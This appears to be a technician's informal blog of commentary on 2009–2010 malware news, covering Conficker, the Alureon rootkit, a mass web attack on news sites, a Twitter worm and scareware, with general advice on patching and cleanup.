Link: http://www.itworld.com/internet/110593/mass-web-attack-hits-wall-street-journal-jerusalem-post?source=itw_rss

Looks like system repairers will be busy again this week....

Cisco Systems' Web-tracking subsidiary, ScanSafe, started following the incident two days ago, said Mary Landesman, a senior security researcher with Cisco. Somehow, the hackers have posted malicious HTML code on the affected Web sites that redirects victims to a malicious Web server. This server tries to install software on Web visitors' computers. If it's successful, the software gives the criminals a way to remotely control their victims' PCs.

Big sites like the Wall St. Journal and Jerusalem Post have been associated. Read the article and scan your rig.

Link: http://www.computerworld.com/s/article/9177223/Microsoft_smacks_patch_blocking_rootkit_second_time?source=rss_news

Gods, this was the nasty beast I was battling last week - it's a mutant as it installs into the windows drivers (in my case the Cd Driver) - hides it's files on a hidden partition, and reinstalls malware at every boot. I actually gave up and formatted the machine.

Microsoft has released a new tool that cleans the infection - then you can run Malwarebytes to clean up the leftovers. (Malwarebytes cant remove this one on it's own)

According to the Microsoft Malware Prevention Center (MMPC), this month's Malicious Software Removal Tool (MSRT) has scrubbed the Alureon rootkit from over 360,000 Windows PCs since its May 11 release. That represented 18.2% of all MSRT detections for the month, more than double the 8.3% the rootkit accounted for in April.

The free MSRT is updated each month as part of Microsoft's monthly Patch Tuesday, and pushed to users via the same Windows Update mechanism used to serve up security fixes.

Link: http://tips.vlaurie.com/2010/04/symantec-internet-security-threat-report/

Taking a look at the top offenders - one program really stands out. Internet Explorer. I see examples of this in the wild all the time. Yeah, Adobe is up there too - so keep your Acrobat and Flash updated and use Chrome or Firefox or Opera. Just doing those three simple things can keep you from having to go to Geek Squad - or at worst getting your machine rebuilt from scratch.

Oh by the way - there's a new IE8 Flaw that puts users at risk... go figure.

Link: http://it.slashdot.org/story/09/07/10/0452256/Korean-DDoS-Bots-To-Self-Destruct

Oh boy,

Several news sources are reporting that the tens of thousands of Microsoft Windows systems infected with the Mydoom worm and being used in an ongoing denial of service attack against US and S. Korean government Web sites will likely have their hard drives wiped of data come Friday.

Well, one good thing - all those infected machines will be really really easy to identify ...

Get your Windows Cd ready for reinstall.....

Link: http://www.appleinsider.com/articles/09/06/11/microsoft_announces_free_anti_virus_service_for_windows.html

You're gonna love this - whats worse than Windows Defender ? No, sadly it's not a joke. I mean I've seen countless malware apps slip right past that wonder of a useless software package... not to mention the hassle of installing it... oh sure - please verify your Windows copy is legit 14 times and all..

No, this new offering is cloud based - so all your traffic goes through Microsoft's servers to be sterilized.

Aha, I'm sure no bad will come of that. - What's the data retention policy? Will that search for Win XP key codes go through? I figure no serious user will have anything to do with this one.

The other question is - will it be a good tool to protect the clueless noobs? IMHO not if it's anywhere near as lax as Defender.

Link: http://news.zdnet.com/2100-9595_22-292858.html

You do remember the Conficker virus right? Well, it hasn't gone away. All those folks that have infected systems are now sending spam out unknowingly.

According to a report by Xinhua News Agency, Conficker-infected machines are now being turned into servers for e-mail spam. Quoting Vincent Weafer, vice president of Symantec Security Response, Xinhua reported Conficker now installs a second virus--Waledac--that sends out e-mail spam without the computer owner's knowledge.

I figure we will all start seeing an increase on the already overwhelming volume of spam.

Link: http://news.cnet.com/8301-1009_3-10218363-83.html

Security experts say be careful who you follow on Twitter, after worm attacks leave some users with infected profiles- worm infected "tens of thousands of users".

Yep, here we go again - all so you can find out that Joe Schmo is still having regular bowel movements and all.....

Link: http://news.cnet.com/8301-1009_3-10217386-83.html

Ok, the plot thins... so far Confickers turned out to be a very elaborate scheme to make money....

If your PC has - Spyware Protect 2009 and is displaying warning messages saying that the computer is infected and offering to clean it up for $49.95

You've been had once - if you go and spend for this crapware you'll have been had twice ...

Tho I have nothing against you if you call me to fix your problems, as long as you have a few hundred.95

The nefarious conficker worm just woke up and started downloading - Firstly the conficker variant got updated and got some new functions.

This from SANS

Various sources report that some conficker infected systems are receiving updates now. The update may include a keylogger and other code to exfiltrate data. We will keep this diary updates as we hear more. The update is delivered using the P2P mechanism

Word on the street is that the new payload it's taking after that is a rootkit. - which makes prefect sense - you can clean up the conficker worm... cleaning the rootkit is an entirely different matter.

If it is a rootkit conficker will be doing what most of us thought it would all along - harvest bank accounts, credit cards, personal data -

someone stands to make a lot of money off of it. Weather they sell the data or use it themselves.

If you still are unsure if you are infected there is a simple test

if you fail this test you could try one of the many removal tools

But be aware - if you aren't sure what you're doing or aren't particularly technically savvy.... get you a tech.